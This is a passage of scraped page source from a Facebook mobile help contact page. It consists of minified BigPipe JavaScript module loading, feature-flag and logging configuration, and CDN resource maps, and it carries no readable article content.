7202999796309,n:"",p:"selectedIndex",v:"2"}],[],"295038365360854"],1]],elements:[["__elem_0b9a2a66_0_0_Ra","u_0_2_hV",1],["__elem_62659873_0_0_j3","u_0_3_bX",1],["__elem_e980dec4_0_0_Bd","u_0_4_D8",1],["__elem_49f6b607_0_0_RY","root",1],["__elem_eed16c0a_0_0_Jy","u_0_5_nn",1],["__elem_a588f507_0_0_ZX","u_0_6_Yd",1],["__elem_a588f507_0_1_+n","u_0_7_JO",1],["__elem_0cdc66ad_0_0_fh","u_0_9_Ck",1],["__elem_0cdc66ad_0_1_am","u_0_a_lW",1]],require:[["MHelpHeader","init",[],[]],["__inst_0b9a2a66_0_0_/G"],["MTouchable"],["MTypeahead","main",[],[{addExtraData:false,id:"u_0_0_Qz",textinput:"523673461757162",hiddeninput:"u_0_1_Ph",sources:{bootstrapped:{source_key:"countries",src:"/ajax/typeahead/countries/"}},navigateOnSelect:false,requireSelection:true,showBootstrapOnFocus:false,bootstrapMaximumResultCount:null,showQueryResultsOnFocus:false,shouldMergeResults:true,autoscroll:true,showPhoto:false,photoSize:null,usesCustomClickEvent:false,skipDefaultResultHref:false,metrics:[],exclusions:null}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_49f6b607_0_0_RY"],[[{__m:"__elem_49f6b607_0_0_RY"}]]],["GHLSurvey","survey",[],[]],["MScrollPositionSaver"],["MPageHeaderAccessibility"],["MBackButton","main",[],[]],["MBlockingTouchable","init",["__elem_e980dec4_0_0_Bd"],[{__m:"__elem_e980dec4_0_0_Bd"}]],["LoadingIndicator","init",["__elem_eed16c0a_0_0_Jy","__elem_a588f507_0_0_ZX","__elem_a588f507_0_1_+n"],[{__m:"__elem_eed16c0a_0_0_Jy"},{__m:"__elem_a588f507_0_0_ZX"},{__m:"__elem_a588f507_0_1_+n"}]],["MPageError"],["MBlockingTouchable","init",["__elem_0cdc66ad_0_0_fh"],[{__m:"__elem_0cdc66ad_0_0_fh"}]],["MBlockingTouchable","init",["__elem_0cdc66ad_0_1_am"],[{__m:"__elem_0cdc66ad_0_1_am"}]],["MLoadingIndicator","init",[],["u_0_8_jN"]],["MPageLoadClientMetricsCallbacks","init",[],[{lid:"7079704837109214812-0"}]],["LogHistoryListeners"],["ScriptPath","set",[],["MContactController","0abd26d7",{imp_id:"06AhEuLe16WQZvmMb",ef_page:null}]],["MCommentViewportTracking","singleton",[],[{enabled:true,debug_console:false,debug_html:false,idle_timeout:5000,min_duration_to_log:100,min_visible_size:200}]],["MLogging","main",[],[{refid:0}]],["RemoteDevice","init",[],[{performHardwareDetection:false,hashId:null,vpd:false}]],["Artillery"],["MLink","setupListener",[],[]],["MLinkHack"],["MModalDialogInit"],["MVerifyCache","main",[],[{viewer:100050080633618}]],["EventProfiler"],["MPageNavigationTracking","init",[],[]],["FalcoLoggerTransports","attach",[],[]],["ScriptPathLogger","startLogging",[],[]],["MTimeSpentBitArrayLogger","init",[],["m",false]],["MCoreDeferred"],["FbtLogging"],["IntlQtEventFalcoEvent"],["BanzaiScuba_DEPRECATED"],["MPageControllerImpl"],["LogWebMemoryUsageFalcoEvent"],["MPageFetcherImpl"],["json-bigint"],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","MPageControllerImpl","LogWebMemoryUsageFalcoEvent","VisualCompletionGating","MPageFetcherImpl","json-bigint"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","MPageControllerImpl","LogWebMemoryUsageFalcoEvent","VisualCompletionGating","MPageFetcherImpl","json-bigint"],"css"]]],pre_display_requires:[["AddressBar","setupLoadListener",[],[],4],["MobileBigPipeStratcomProxy","init",[],[],4],["Stratcom","init",[],[],4],["MViewport","init",[],[],4],["ViewportDimensions","init",[],[],4],["MPageController","init",[],[],4],["onSyncTTI","run",[],[],4],["MLiteInit","init",[],[],4]]},hsrp:{hsdp:{clpData:{"1814852":{r:1},"1838142":{r:1,s:1},"1942319":{r:1,s:1},"1842512":{r:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1},"1848815":{r:10000,s:1},"1949898":{r:1},"1765264":{r:1,s:1}},gkxData:{"3959":{result:true,hash:"AT5An4B4pPVNHiK8REE"},"676837":{result:false,hash:"AT4N8wBZA8ctCdHwXMA"},"1167394":{result:false,hash:"AT7BpN-tlUPwbIIFWO0"},"1059877":{result:false,hash:"AT53XV4TWT4lc3_mzEI"},"1070739":{result:false,hash:"AT5rKAR6NQAuoRaHYfQ"},"676811":{result:false,hash:"AT4zC0IqvJCbKsUeC5c"},"676812":{result:true,hash:"AT6FULe6g-qrrrQdKsE"},"820050":{result:true,hash:"AT7bjlcFFlowDw-SRI4"},"985697":{result:false,hash:"AT6gOJD7fT0UjmgDL4o"},"148":{result:false,hash:"AT5V6Me6WVwsRI3wPcE"},"5525":{result:false,hash:"AT56gpXxsmc6rAjx-RQ"},"1994902":{result:false,hash:"AT7e2ODUd_zspuYFnpE"},"712819":{result:true,hash:"AT79nTpb4gT-yu86aHI"},"2223":{result:false,hash:"AT4s3JaAt9nQ6ucmq18"},"2341":{result:false,hash:"AT7nNd913_uqf_cRbKY"},"726410":{result:true,hash:"AT7w-jbTa3ueodj3lVM"},"5541":{result:true,hash:"AT70V-Q_zfEykznO0E4"},"676781":{result:true,hash:"AT4-DnA47xPbjtkwgXg"},"862436":{result:false,hash:"AT7YsAcWL8-1WZrOzm4"},"1099893":{result:false,hash:"AT5kly2LSZV_DKGRK-c"},"2000814":{result:true,hash:"AT7LrOX2Gv9w1GQwxis"},"3499":{result:true,hash:"AT5l5tI3kdeSuUxUERA"}},qexData:{"91":{r:false},"123":{r:false},"648":{r:false,l:"J{\"u\":\"react_core_www\",\"t\":\"fb\",\"gks\":[],\"qe\":null}"},"650":{r:50,l:"J{\"u\":\"react_core_www\",\"t\":\"fb\",\"gks\":[],\"qe\":null}"},"651":{r:300,l:"J{\"u\":\"react_core_www\",\"t\":\"fb\",\"gks\":[],\"qe\":null}"}}},hblp:{consistency:{rev:1005252392},rsrcMap:{"1GzRKWC":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/uqFCPZu4BB9.js?_nc_x=IqwH59e_Ga0",nc:1},WSnCXIu:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/YvcV_hOY251.js?_nc_x=IqwH59e_Ga0",nc:1},PHeKYkw:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/LS7kGQIR1Bo.js?_nc_x=IqwH59e_Ga0",nc:1},lZZnVFH:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/ngoBhFBLB-O.js?_nc_x=IqwH59e_Ga0",nc:1},qwAZCkc:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ijfq4/y2/l/en_US/IPFXibTBn5v.js?_nc_x=IqwH59e_Ga0",nc:1},FJqL2Al:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yl/r/ilMFccLWbov.js?_nc_x=IqwH59e_Ga0",nc:1},"/6ajLJK":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/JOVw7FP3IdA.js?_nc_x=IqwH59e_Ga0",nc:1},IsQZRlw:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/6yzFRRzYsZb.js?_nc_x=IqwH59e_Ga0",nc:1},bJ922yg:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/2jr_tFUjDMy.js?_nc_x=IqwH59e_Ga0",nc:1},n35cwAF:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3i8594/y3/l/en_US/g2jtnOgcf-j.js?_nc_x=IqwH59e_Ga0",nc:1},prwoyZP:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/rmE_4NsJm4a.js?_nc_x=IqwH59e_Ga0",nc:1},RO0pHC2:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iooI4/yf/l/en_US/UCanXjOuttN.js?_nc_x=IqwH59e_Ga0",nc:1},WLcinoG:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ilqt4/yp/l/en_US/nsUyoi4BsfM.js?_nc_x=IqwH59e_Ga0",nc:1},KjISTxl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iJMr4/yB/l/en_US/4MUKuAk9Faq.js?_nc_x=IqwH59e_Ga0",nc:1},"KL2Ev9+":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ih-D4/yT/l/en_US/rDkjJ8n2bFN.js?_nc_x=IqwH59e_Ga0",nc:1},JJZ5vsB:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/XLbnXgAgtPB.js?_nc_x=IqwH59e_Ga0",nc:1},"5i4yS7A":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/mnsr3a33Qz-.js?_nc_x=IqwH59e_Ga0",nc:1},TUxV68S:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/AEurEMwqHIo.js?_nc_x=IqwH59e_Ga0",nc:1},"eQE/lWy":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/n-ApPpuEI8K.js?_nc_x=IqwH59e_Ga0",nc:1}},compMap:{ODS:{r:["1GzRKWC"],be:1},TransportSelectingClientSingleton:{r:["WSnCXIu","1GzRKWC"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED","FbtLogging","IntlQtEventFalcoEvent"],r:["pUZ0T8G","PHeKYkw","lZZnVFH","qwAZCkc","FJqL2Al"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["WSnCXIu"],be:1},Cookie:{r:["1GzRKWC"],rds:{m:["BanzaiScuba_DEPRECATED"],r:["pUZ0T8G"]},be:1},WebSpeedInteractionsTypedLogger:{r:["1GzRKWC","TUxV68S","FJqL2Al","pUZ0T8G"],rds:{m:["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"]},be:1},PerfXSharedFields:{r:["1GzRKWC"],be:1}}}},allResources:["QgfUBa5","0lu+WFi","oy0uzo+","Vuff6Su","k8op+XT","sykFmfw","pUZ0T8G","1GzRKWC","tDDXq/O","/6ajLJK","IsQZRlw","bJ922yg","n35cwAF","prwoyZP","RO0pHC2","WLcinoG","KjISTxl","KL2Ev9+","JJZ5vsB","5i4yS7A","FJqL2Al","eQE/lWy","qwAZCkc"]});}));</script>
<script>requireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7079704837109214812-0")});CavalryLogger.setPageID("7079704837109214812-0");</script><script nonce="">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script>
<script nonce="">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({id:"last_response",phase:63,last_in_phase:true,the_end:true,jsmods:{define:[["MTouchableSyntheticClickGK",[],{USE_SYNTHETIC_CLICK:true},368],["TimeSliceInteractionSV",[],{on_demand_reference_counting:true,on_demand_profiling_counters:true,default_rate:1000,lite_default_rate:100,interaction_to_lite_coinflip:{ADS_INTERFACES_INTERACTION:0,ads_perf_scenario:0,ads_wait_time:0,Event:10},interaction_to_coinflip:{ADS_INTERFACES_INTERACTION:1,ads_perf_scenario:1,ads_wait_time:1,Event:500},enable_heartbeat:true,maxBlockMergeDuration:0,maxBlockMergeDistance:0,enable_banzai_stream:true,user_timing_coinflip:50,banzai_stream_coinflip:0,compression_enabled:true,ref_counting_fix:false,ref_counting_cont_fix:false,also_record_new_timeslice_format:false,force_async_request_tracing_on:false},2609],["MBootstrapCacheMaxCacheTime",[],{maxCacheTimeByKey:{typeahead_facebar3:1209600000,typeahead_search_bem3:1209600000}},2886],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["cr:334",["ghlTestUBTFacebook"],{__rc:["ghlTestUBTFacebook","Aa0BIQkEbBBqIop3WzrWeMql9yfLMdaPoecZ1rSN3OLySfhmwZoznqEDAvUt9OY1gWAFVtZpM-9BXDa51RQw4m8nPw"]},-1],["cr:1088657",[],{__rc:[null,"Aa0slCAqa9ZWe1nkMPVDUMBMbAZmORgVMt_DKIyiXYWXopiY92ItbmlxLdsVUsaBqe3MN_xK4GvOrnuLNMrDKRs"]},-1],["cr:1543261",[],{__rc:[null,"Aa1I-HlqlqKph11k3xdt6HKr8xkyIoaFwsKEYXZjLfdn08YYO79u6qftqvAx999N-o1G5gkcYwl6A50QDkgZ0JF8"]},-1],["cr:708886",["EventProfilerImpl"],{__rc:["EventProfilerImpl","Aa0FcCbb3nSCVnU0n_rlf6PYW4PRUjGOY2W9O6CJG5e_BREoTjwyUAlLObW7Su2YZRNRSDmlAwSw2u58Sf5AHCvO4ZI"]},-1],["cr:1094907",[],{__rc:[null,"Aa1dZq6dDwRvp01Hu7SPzUEvlFfTTzK-2e2JH8FI4hp0xjD5yffYUFhx7WnaP--8o5MPJVCyICN88aJ3LHMN67Y"]},-1],["EventConfig",[],{sampling:{bandwidth:0,play:0,playing:0,progress:0,pause:0,ended:0,seeked:0,seeking:0,waiting:0,loadedmetadata:0,canplay:0,selectionchange:0,change:0,timeupdate:0,adaptation:0,focus:0,blur:0,load:0,error:0,message:0,abort:0,storage:0,scroll:200000,mousemove:20000,mouseover:10000,mouseout:10000,mousewheel:1,MSPointerMove:10000,keydown:0.1,click:0.02,mouseup:0.02,__100ms:0.001,__default:5000,__min:100,__interactionDefault:200,__eventDefault:100000},page_sampling_boost:1,interaction_regexes:{},interaction_boost:{},event_types:{},manual_instrumentation:false,profile_eager_execution:false,disable_heuristic:true,disable_event_profiler:false},1726],["IntlCurrentLocale",[],{code:"en_US"},5954],["KillabyteProfilerConfig",[],{htmlProfilerModule:null,profilerModule:null,depTypes:{BL:"bl",NON_BL:"non-bl"}},1145],["QuicklingConfig",[],{version:"1005252392;0;",sessionLength:10,inactivePageRegex:"^/(fr/u\\.php|ads/|advertising|ac\\.php|ae\\.php|a\\.php|ajax/emu/(end|f|h)\\.php|badges/|comments\\.php|connect/uiserver\\.php|editalbum\\.php.+add=1|ext/|feeds/|help([/?]|$)|identity_switch\\.php|isconnectivityahumanright/|intern/|login\\.php|logout\\.php|sitetour/homepage_tour\\.php|sorry\\.php|syndication\\.php|webmessenger|/plugins/subscribe|lookback|brandpermissions|gameday|pxlcld|comet|worldcup/map|livemap|work/reseller|([^/]+/)?dialog|legal|.+\\.pdf$|.+/settings/)",badRequestKeys:["nonce","access_token","oauth_token","xs","checkpoint_data","code"],logRefreshOverhead:false},60]],require:[["BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1637128278,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:17,hbv:"7081751393706796582"}]],["NavigationMetrics","setPage",[],[{page:"MContactController",page_type:"normal",page_uri:"https://m.facebook.com/help/contact/295038365360854?id=342509036134712&refid=69&ref=104&_rdr",serverLID:"7079704837109214812-0"}]],["CavalryLoggerImpl","startInstrumentation",[],[]],["Artillery","disable",[],[]],["ServiceWorkerURLCleaner","removeRedirectID",[],[]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoY_gA"}}},hblp:{consistency:{rev:1005252392},rsrcMap:{t1KEUNA:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/HRoaPibbahM.js?_nc_x=IqwH59e_Ga0",nc:1},FEt5GzN:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/KWY7Edb5_DT.js?_nc_x=IqwH59e_Ga0",nc:1}}}},allResources:["t1KEUNA","1GzRKWC","FEt5GzN","5i4yS7A","pUZ0T8G"],onload:["CavalryLogger.getInstance(\"7079704837109214812-0\").setTTIEvent(\"t_domcontent\");"],onafterload:["window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp(\"t_paint\");","if (window.ExitTime){CavalryLogger.getInstance(\"7079704837109214812-0\").setValue(\"t_exit\", window.ExitTime);};"]});}));</script><div class="AdBox Ad advert post-ads"></div><div class="sponsorPost"></div></body></html>